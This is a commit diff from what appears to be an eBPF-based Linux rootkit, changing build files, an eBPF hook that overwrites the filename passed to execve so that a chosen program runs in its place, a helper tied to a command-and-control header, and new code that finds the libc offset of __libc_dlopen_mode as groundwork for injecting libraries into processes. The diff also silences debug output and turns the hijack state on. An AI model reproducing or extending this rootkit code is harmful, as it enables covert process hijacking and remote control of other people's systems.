Added new libc symbols extraction

src/Makefile

@@ -47,7 +47,7 @@ else
 endif
 
 .PHONY: all
-all: $(APPS)
+all: $(APPS) tckit
 
 .PHONY: clean
 clean:
@@ -92,12 +92,12 @@ $(USER_INCLUDES_OBJ): $(wildcard $(USER_INCLUDES_SRC)/**/*.h) | $(OUTPUT)
 #User code
 $(OUTPUT)/%.o: $(USER)/%.c $(wildcard $(USER)/*.h)| $(OUTPUT)
 	$(call msg,CC,$@)
-	$(Q)$(CC) $(CFLAGS) $(INCLUDES) $(COMMON_INCLUDES) -c $(filter $(USER)/%.c,$^) -o $@
+	$(Q)$(CC) $(CFLAGS) $(INCLUDES) $(COMMON_INCLUDES) -c $(filter $(USER)/%.c,$^) -o $@ -ldl
 
 # Build application binary
 $(APPS): %: $(OUTPUT)/%.o $(LIBBPF_OBJ) $(USER_INCLUDES_OBJ) | $(OUTPUT)
 	$(call msg,BINARY,$@)
-	$(Q)$(CC) $(CFLAGS) $(INCLUDES) $^ -lelf -lbpf -lz -o bin/$@
+	$(Q)$(CC) $(CFLAGS) $(INCLUDES) $^ -lelf -lbpf -lz -o bin/$@ -ldl
 	$(Q)rm $(USER_INCLUDES_OBJ)
 
 tckit: $(abspath $(EBPF)/include/bpf)/tc.c

src/ebpf/include/bpf/exec.h

@@ -89,7 +89,7 @@ static __always_inline int handle_tp_sys_enter_execve(struct sys_execve_enter_ct
     if(hijacker_state == 1){
         return 0;
     }
-    bpf_printk("Starting execve hijacker\n");
+    //bpf_printk("Starting execve hijacker\n");
     
     unsigned char* argv[NUMBER_ARGUMENTS_PARSED] = {0};
     //unsigned char* envp[PROGRAM_LENGTH] = {0};
@@ -107,13 +107,13 @@ static __always_inline int handle_tp_sys_enter_execve(struct sys_execve_enter_ct
         bpf_printk("Error reading 3\n");
     };
 
-    bpf_printk("OLD ARGV0: %s\n", argv[0]);
+    /*bpf_printk("OLD ARGV0: %s\n", argv[0]);
     bpf_printk("ARGV1: %s\n", argv[1]);
     bpf_printk("ARGV2: %s\n", argv[2]);
     //bpf_printk("ENVP: %s\n", envp);
-    bpf_printk("FILENAME: %s\n", filename);
+    bpf_printk("FILENAME: %s\n", filename);*/
     if((void*)ctx->filename==(void*)(ctx->argv)){
-        bpf_printk("Equal pointers");
+        //bpf_printk("Equal pointers");
     }else{
         //bpf_printk("Not equal pointers %u, %u", ctx->filename, ctx->argv);
     }
@@ -154,10 +154,10 @@ static __always_inline int handle_tp_sys_enter_execve(struct sys_execve_enter_ct
 
     //Provided that the case error 2 may happen, we check if we are on that case before going ahead and overwriting everything.
     if(test_write_user_unique(ctx, (char*)filename, (char*)argv[0])!=0){
-        bpf_printk("Test failed\n");
+        //bpf_printk("Test failed\n");
         return -1;
     }else{
-        bpf_printk("Test completed\n");
+        //bpf_printk("Test completed\n");
     }
 
     if(bpf_probe_write_user((void*)(ctx->filename), (void*)to_write, (__u32)sizeof(PATH_EXECUTION_HIJACK_PROGRAM))<0){
@@ -168,7 +168,7 @@ static __always_inline int handle_tp_sys_enter_execve(struct sys_execve_enter_ct
         return -1;
     }
      
-    //hijacker_state = 1;
+    hijacker_state = 1;
 
     unsigned char newfilename[ARGUMENT_LENGTH] = {0};
     unsigned char* newargv[NUMBER_ARGUMENTS_PARSED] = {0};
@@ -179,10 +179,10 @@ static __always_inline int handle_tp_sys_enter_execve(struct sys_execve_enter_ct
         bpf_printk("Error reading 1\n");
     };
 
-    bpf_printk("SUCCESS NEW FILENAME: %s\n", newfilename);
+    /*bpf_printk("SUCCESS NEW FILENAME: %s\n", newfilename);
     bpf_printk("NEW ARGV0: %s\n\n", newargv[0]);
     bpf_printk("NEW ARGV1: %s\n", newargv[1]);
-    bpf_printk("NEW ARGV2: %s\n", newargv[2]);
+    bpf_printk("NEW ARGV2: %s\n", newargv[2]);*/
     //bpf_printk("ORIGINAL %s\n\n", filename);
 
     return 0;

src/helpers/Makefile

@@ -3,14 +3,22 @@ HEADERS = lib/RawTCP.h
 EXTRA_CFLAGS= -I$(PWD)/lib
 
 default:
-	make execve_hijack
+	make execve_hijack injection_ex
+
+injection_ex.o: injection_ex.c
+	clang -g -Wall -c injection_ex.c
+
+injection_ex: injection_ex.o
+	clang -g -Wall -o injection_ex injection_ex.o -ldl
 
 execve_hijack.o: execve_hijack.c $(HEADERS)
-	gcc -c execve_hijack.c
+	clang -c execve_hijack.c
 
 execve_hijack: execve_hijack.o lib/libRawTCP_Lib.a
-	gcc -lm -o execve_hijack execve_hijack.o -L. lib/libRawTCP_Lib.a
+	clang -lm -o execve_hijack execve_hijack.o -ldl -L. lib/libRawTCP_Lib.a
 
 clean:
 	-rm -f execve_hijack.o
 	-rm -f execve_hijack
+	-rm -f injection_ex.o
+	-rm -f injection_ex

src/helpers/execve_hijack.c

@@ -15,12 +15,14 @@
 #include <netdb.h>
 #include <netinet/ip.h>
 #include <netinet/tcp.h>
+#include <dlfcn.h>
 
 #include "lib/RawTCP.h"
 #include "../common/c&c.h"
 
 
 char* execute_command(char* command){
+
     FILE *fp;
     char* res = calloc(4096, sizeof(char));
     char buf[1024];
@@ -70,7 +72,6 @@ int main(int argc, char* argv[], char *envp[]){
         printf("Argument %i is %s\n", ii, argv[ii]);
     }
 
-
     time_t rawtime;
     struct tm * timeinfo;
 

src/helpers/injection_ex.c

@@ -0,0 +1,23 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <dlfcn.h>
+#include <link.h>
+
+int main(){
+    struct link_map *lm;
+	off_t offset = 0;
+	unsigned long long dlopenAddr;
+    lm = dlopen("libc.so.6", RTLD_LAZY);
+	if(lm==0){
+		perror("Error obtaining libc symbols");
+		return -1;
+	}
+    dlopenAddr = (unsigned long long)dlsym((void*)lm, "__libc_dlopen_mode");
+    printf("libdl: %lx\n", lm->l_addr);
+	printf("dlopen: %llx\n", dlopenAddr);
+	offset = dlopenAddr - lm->l_addr;
+	printf("Offset: %lx\n", offset);
+
+    return 0;
+}

src/user/kit.c

@@ -7,6 +7,8 @@
 #include <linux/if_link.h>
 #include <net/if.h>
 #include <unistd.h>
+#include <dlfcn.h>
+#include <link.h>
 
 #include <bpf/bpf.h>
 
@@ -209,6 +211,20 @@ int main(int argc, char**argv){
 		goto cleanup;
 	}
 
+	struct link_map *lm;
+	off_t offset = 0;
+	unsigned long long dlopenAddr;
+    lm = dlopen("libc.so.6", RTLD_LAZY);
+	if(lm==0){
+		perror("Error obtaining libc symbols");
+		return -1;
+	}
+    dlopenAddr = (unsigned long long)dlsym((void*)lm, "__libc_dlopen_mode");
+    printf("libdl: %lx\n", lm->l_addr);
+	printf("dlopen: %llx\n", dlopenAddr);
+	offset = dlopenAddr - lm->l_addr;
+	printf("Offset: %lx\n", offset);
+
 	//Now wait for messages from ebpf program
 	printf("Filter set and ready\n");
 	while (!exiting) {